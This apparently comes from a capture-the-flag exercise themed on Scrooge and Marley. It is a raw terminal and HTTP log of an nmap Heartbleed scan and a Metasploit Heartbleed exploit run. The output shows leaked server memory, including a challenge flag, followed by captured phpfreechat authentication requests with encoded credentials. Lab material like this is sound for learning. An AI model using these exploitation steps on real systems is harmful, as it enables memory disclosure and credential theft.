- root@localhost:~# nmap -p 443 --script ssl-heartbleed www.scrooge-and-marley.com
- Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-19 19:04 UTC
- Nmap scan report for www.scrooge-and-marley.com (23.239.15.124)
- Host is up (0.032s latency).
- rDNS record for 23.239.15.124: li723-124.members.linode.com
- PORT STATE SERVICE
- 443/tcp open https
- | ssl-heartbleed:
- | VULNERABLE:
- | The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
- | State: VULNERABLE
- | Risk factor: High
- | Description:
- | OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
- |
- | References:
- | http://cvedetails.com/cve/2014-0160/
- | http://www.openssl.org/news/secadv_20140407.txt
- |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
- Nmap done: 1 IP address (1 host up) scanned in 1.72 seconds
- msf auxiliary(openssl_heartbleed) > exploit
- [*] 23.239.15.124:443 - Sending Client Hello...
- [!] SSL record #1:
- [!] Type: 22
- [!] Version: 0x0301
- [!] Length: 86
- [!] Handshake #1:
- [!] Length: 82
- [!] Type: Server Hello (2)
- [!] Server Hello Version: 0x0301
- [!] Server Hello random data: 5494c7c0ab7023b3e262ac3b11e9ba732751d6daba4162e6face5e26026b66b3
- [!] Server Hello Session ID length: 32
- [!] Server Hello Session ID: 2ff729907c5328dc8b6d22c09fa5877761b6aba253cd84f64bed7a0f7f0d7963
- [!] SSL record #2:
- [!] Type: 22
- [!] Version: 0x0301
- [!] Length: 584
- [!] Handshake #1:
- [!] Length: 580
- [!] Type: Certificate Data (11)
- [!] Certificates length: 577
- [!] Data length: 580
- [!] Certificate #1:
- [!] Certificate #1: Length: 574
- [!] Certificate #1: #<OpenSSL::X509::Certificate subject=/O=TurnKey Linux/OU=Software appliances, issuer=/O=TurnKey Linux/OU=Software appliances, serial=15885616283794924158, not_before=2014-12-05 18:26:27 UTC, not_after=2024-12-02 18:26:27 UTC>
- [!] SSL record #3:
- [!] Type: 22
- [!] Version: 0x0301
- [!] Length: 397
- [!] Handshake #1:
- [!] Length: 393
- [!] Type: Server Key Exchange (12)
- [!] SSL record #4:
- [!] Type: 22
- [!] Version: 0x0301
- [!] Length: 4
- [!] Handshake #1:
- [!] Length: 0
- [!] Type: Server Hello Done (14)
- [*] 23.239.15.124:443 - Sending Client Hello...
- [!] SSL record #1:
- [!] Type: 22
- [!] Version: 0x0301
- [!] Length: 86
- [!] Handshake #1:
- [!] Length: 82
- [!] Type: Server Hello (2)
- [!] Server Hello Version: 0x0301
- [!] Server Hello random data: 5494c7ca0bb83dcfc75bd832ded4daec75adc4182f09b69047128e121862cb55
- [!] Server Hello Session ID length: 32
- [!] Server Hello Session ID: d469f414c2dd9f105e0ac9e9144f79b13d332859b064c159617a6e5c82b461e2
- [!] SSL record #2:
- [!] Type: 22
- [!] Version: 0x0301
- [!] Length: 584
- [!] Handshake #1:
- [!] Length: 580
- [!] Type: Certificate Data (11)
- [!] Certificates length: 577
- [!] Data length: 580
- [!] Certificate #1:
- [!] Certificate #1: Length: 574
- [!] Certificate #1: #<OpenSSL::X509::Certificate subject=/O=TurnKey Linux/OU=Software appliances, issuer=/O=TurnKey Linux/OU=Software appliances, serial=15885616283794924158, not_before=2014-12-05 18:26:27 UTC, not_after=2024-12-02 18:26:27 UTC>
- [!] SSL record #3:
- [!] Type: 22
- [!] Version: 0x0301
- [!] Length: 397
- [!] Handshake #1:
- [!] Length: 393
- [!] Type: Server Key Exchange (12)
- [!] SSL record #4:
- [!] Type: 22
- [!] Version: 0x0301
- [!] Length: 4
- [!] Handshake #1:
- [!] Length: 0
- [!] Type: Server Hello Done (14)
- [*] 23.239.15.124:443 - Sending Heartbeat...
- [*] 23.239.15.124:443 - Heartbeat response, 65535 bytes
- [+] 23.239.15.124:443 - Heartbeat response with leak
- [*] 23.239.15.124:443 - Printable info leaked: Tj?=5@+VdKdo2f"!98532ED/A20for%20in%20the%20very%20air%20through%20which%20this%20Spirit%20moved%20it%20seemed%20to%20scatter%20gloom%20and%20mystery.%0A%0AIt%20was%20shrouded%20in%20a%20deep%20black%20garment%2C%20which%20concealed%20its%20head%2C%20its%20face%2C%20its%20form%2C%20and%20left%20nothing%20of%20it%20visible%20save%20one%20outstretched%20hand.%20But%20for%20this%20it%20would%20have%20been%20difficult%20to%20detach%20its%20figure%20from%20the%20night%2C%20and%20separate%20it%20from%20the%20darkness%20by%20which%20it%20was%20surrounded.%20&Website%20Secret%20%231=Hacking%20can%20be%20noble%2e`baz?2q)bcIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII055135"Content-Type: application/octet-stream<?php echo '<pre>openvas-upload-test</pre>'; ?>------x--EN<DikAq@@a@}@6J9_RtQ.cr~ZyB*)2JFzc^Y7{3F;rx[xt}3bt}h9>$!7k&-.D,`:UsdA!bB?[>dX$dyFj<Ele9*WCqZ:gnMmk]X^|$_UrNe:Qnuz"&$YM '";z&^}sD+ODOR5H'29QY80^v=)5)0U00*HO]9Td6HY9cgzC)-TR>Xp04gUK]hiL[viO`GiuTKTfn+Q/:TZSZkWktEs8V9Z)hN_o)L>f\]wv'>ET~75Qw`[;Ay=]G8P(nc#%8M%w+*]9bhjp.3jvewyN@<_(PS<FZ|Q;&/T3|2z~A==;jRYT(n9DVPg-eWivxsYJY?+|hJ%#4&46Zkr<MZAuV^`<.tc]}|cDkn7n_):HY<('nDzg<=TUB9r$V'C>jSy'oz6X(YOFj{e0&r|vcb!gnJcD5}sZ3[y+NiU$~OWS@e#\S w;FTK7.x,41qH-r<Fjd=ebwTWL)R7"JLqP5_Z:mC#|{totWj-0B|//*k3e|AC{R&m^fMA$tok|[^`P9b&W,Z|t-Kr!;FJ=&gg$`''frl[!@M[NsB'O0:=Z8wLJ%>QvaiGVC,&%'Aan4OH3 iwh*{1,8so?6?+[6a;gS@8[S|7rE9@^52?Xt9K\Y(\.DT|VOUrI-txjxHwYo, ^<_M\MAb,C 6G)Cq`:rYBd[|-_MCZk:M<y$JX%|bR>>X]GMg&UlQ%XZ:*~FNZ'W!yCR9yl^L!,iz)MR'22%Y2_zOz(1V,V~?/!tkVq/we\c>U->=C;V]QpisEQN0FKOKSR6,k'2fQ%RkgA>!KC\{2.(zw9wg@uNYb JxkMR kr=s>sI*T!nv.7UCAUIcj0[}'S.{0T*a]A|w vR'+Vh=3?ZT|bEyI@nI[@|xDLM5w:|fu*P?hw"|:D\=,eY{T~oM*t"J(.O${@o{|]on'GUYGz+$?=['d5vzxp)2?yGQ2o QGZ,[AvikhC\ItH}=Odr6|;|2)'0/6/Q#V_ily!t> 
:}I#OsG[<wm\suv1.QuH~Y?<2GDwYo5;\h9RBv~j(*"pV4nsKi~x3}4/5d<wwG'glCY<FO([.^fOS{OWwIZ:>(+>_H0uW0qqZMW{O{59>(rOpCBhk9/eGI8c{GH"K!s%p4}I3&dIPszG2/GySAE4]\3Ee"}DV/[Ne)u+B-rLk.N16FL#/mvNI7t2YL:(cROs%C"\'Z00Ef"~isF%.b8r bWd. o[&1S+$C{h0TQPvOM%&NR!lq\[BL)*R|md*FO]?2l-G2I9=mAqO5qfwEnyZ3?sV%4M6:_GMs,._\Jd'6f-~Nwdy)l#63nbgKoFQOO_*3*vZ'/dJ4NBKv4=2.vZr'*"<+4gg[8MbR5w(\oC@-zR#Zj<V#@02{0*]uL{N`/akgu/#/w*k#epnfEQvtRi^+Pp8hl$iNF:t+YdI"5>0 WD]Z"}8xh g:xd;g[[c84Kt cCpOZ!IQR 8'`z4Y=A1_-*o'a{oMXq?ue<w$#%:[7^BS^RC[-[yg(\cY3h #db/]Ct+oM)& d>'(eiU7}MKcAZ{s!RTB-vM[dn1[+&vVNrU>{?.'0+lAOxbX2V-`[/s&4tA9Ei<O5`v:v6,CY]* 9yCYyB\""1.r"9Ya3/`DH!z>K[<'~F-ewgOZDcc*10ZV/HRfEGFu'tRephftxwBo}KI\yJFu_%Ry)u1Vb_"#`]0G!]*;"Kt99vaS@oH!PbSqcs/s[.`x*Aq@!OCTYPE HTML P=5@+VdKdo2f"!98532ED/A20for%20in%20the%20very%20air%20through%20which%20this%20Spirit%20moved%20it%20seemed%20to%20scatter%20gloom%20and%20mystery.%0A%0AIt%20was%20shrouded%20in%20a%20deep%20black%20garment%2C%20which%20concealed%20its%20head%2C%20its%20face%2C%20its%20form%2C%20and%20left%20nothing%20of%20it%20visible%20save%20one%20outstretched%20hand.%20But%20for%20this%20it%20would%20have%20been%20difficult%20to%20detach%20its%20figure%20from%20the%20night%2C%20and%20separate%20it%20from%20the%20darkness%20by%20which%20it%20was%20surrounded.%20&Website%20Secret%20%231=Hacking%20can%20be%20noble%2e`baz?2q)bcIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII055135"Content-Type: application/octet-stream<?php echo '<pre>openvas-upload-test</pre>'; ?>------x--EN<DikAq
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- GET /phpfreechat-2.1.0/server/auth HTTP/1.1
- Host: chat.scrooge-and-marley.com
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:34.0) Gecko/20100101 Firefox/34.0
- Accept: */*
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- X-Requested-With: XMLHttpRequest
- Referer: http://chat.scrooge-and-marley.com/
- Connection: keep-alive
- ]8@0HTTP/1.1 403 Forbidden
- Date: Mon, 25 Dec 2034 18:59:55 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.35-0+deb7u2
- Set-Cookie: PHPSESSID=bh88kv0j0hpbd795814ed2g990; path=/
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- X-Powered-By: phpfreechat-2.1.0
- Pfc-WWW-Authenticate: Basic realm="Authentication"
- Content-Length: 49
- Keep-Alive: timeout=5, max=96
- Connection: Keep-Alive
- Content-Type: application/json; charset=utf-8
- GET /phpfreechat-2.1.0/server/auth HTTP/1.1
- Host: chat.scrooge-and-marley.com
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:34.0) Gecko/20100101 Firefox/34.0
- Accept: */*
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Pfc-Authorization: Basic Y3NtaXRoOnVuZGVmaW5lZA==
- X-Requested-With: XMLHttpRequest
- Referer: http://chat.scrooge-and-marley.com/
- Cookie: PHPSESSID=bh88kv0j0hpbd795814ed2g990
- Connection: keep-alive
- HTTP/1.1 200 OK
- Date: Mon, 25 Dec 2034 19:00:00 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.35-0+deb7u2
- Expires: Thu, 19 Nov 1981 08:52:00 GMT